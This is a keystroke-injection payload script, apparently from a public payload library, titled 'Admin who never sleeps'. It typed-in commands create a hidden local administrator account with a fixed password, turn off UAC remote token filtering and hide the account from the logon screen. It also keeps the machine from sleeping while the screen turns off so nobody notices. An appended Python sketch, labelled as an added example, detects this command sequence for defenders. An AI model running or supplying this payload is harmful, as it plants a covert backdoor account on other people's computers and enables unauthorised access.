Path: blob/master/payloads/library/execution/Admin_Who_Never_Sleeps/payload.txt
REM Title: Admin who never sleeps
REM Desc: Adds a local hidden admin user and sets power settings to never sleep.
REM Author: UberGuidoZ
REM Target: Windows (local admin required)

REM Launch admin-level CMD prompt
DELAY 3000
GUI r
DELAY 1000
STRING cmd
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
LEFTARROW
DELAY 250
ENTER
DELAY 1500

REM Create local admin user WinSystem with pass Some-P@ssw0rd
STRING net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add
ENTER
DELAY 1500

REM Set WinSystem user pass to never expire, skip UAC, and hide the user
STRING wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0
ENTER
DELAY 1500

REM Change power settings to avoid loss of access later (Hibernation, Standby, Disk Timeout)

STRING powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0
ENTER
DELAY 1000
STRING Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0
ENTER
DELAY 1000
STRING powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0
ENTER
DELAY 1000

REM Set monitor timeouts to avoid noticing system is awake
STRING powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10
ENTER
DELAY 1000

REM Exit and enjoy your user whenever!
EXIT
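Detection note (an added example, not part of the original payload or its repository): the Python sketch below flags a host when several of the steps above show up in process-creation command lines within a short window. The event tuple layout, host names, timestamps, rule names, and the 5-minute / 3-rule thresholds are assumptions made for illustration.

```python
import re
from datetime import datetime, timedelta

# Each rule matches one step of the payload as it would appear in a
# process-creation command line (net.exe, reg.exe, powercfg.exe).
RULES = {
    "local_user_added": re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b", re.I),
    "added_to_admins": re.compile(
        r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    # Value 1 turns off remote UAC token filtering for local accounts.
    "uac_remote_filter_off": re.compile(r"LocalAccountTokenFilterPolicy.*?/d\s+1\b", re.I),
    # Value 0 under SpecialAccounts\UserList hides the account at the logon screen.
    "account_hidden": re.compile(r"SpecialAccounts\\UserList.*?/d\s+0\b", re.I),
    "sleep_disabled": re.compile(
        r"\bpowercfg(\.exe)?\s+(/x|-x|/change)\s+"
        r"-?(standby|hibernate|disk)-timeout-(ac|dc)\s+0\b", re.I),
}

# Constructed sample records: (ISO timestamp, host, command line).
SAMPLE_EVENTS = [
    ("2024-01-10T09:00:05", "WS-042", 'net user WinSystem ******** /add /fullname:"Windows System"'),
    ("2024-01-10T09:00:05", "WS-042", "net localgroup administrators WinSystem /add"),
    ("2024-01-10T09:00:07", "WS-042", r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows'
     r'\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1'),
    ("2024-01-10T09:00:07", "WS-042", r'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
     r'\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0'),
    ("2024-01-10T09:00:10", "WS-042", "powercfg /x -standby-timeout-ac 0"),
    ("2024-01-10T11:30:00", "WS-007", "net user"),                           # benign listing
    ("2024-01-10T11:31:00", "WS-007", "powercfg /x -standby-timeout-ac 0"),  # lone power tweak
]

def classify(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def detect(events, window=timedelta(minutes=5), min_rules=3):
    """Map host -> sorted rule names when >= min_rules distinct rules fire within window."""
    hits = {}
    for ts, host, cmd in events:
        for rule in classify(cmd):
            hits.setdefault(host, []).append((datetime.fromisoformat(ts), rule))
    findings = {}
    for host, seq in hits.items():
        seq.sort()
        for start, _ in seq:
            rules = {r for t, r in seq if start <= t <= start + window}
            if len(rules) >= min_rules:
                findings[host] = sorted(rules)
                break
    return findings
```

A single rule firing alone (for example, one power setting change) is common on managed fleets; the correlation across account creation, registry changes, and power settings is what makes the sequence stand out.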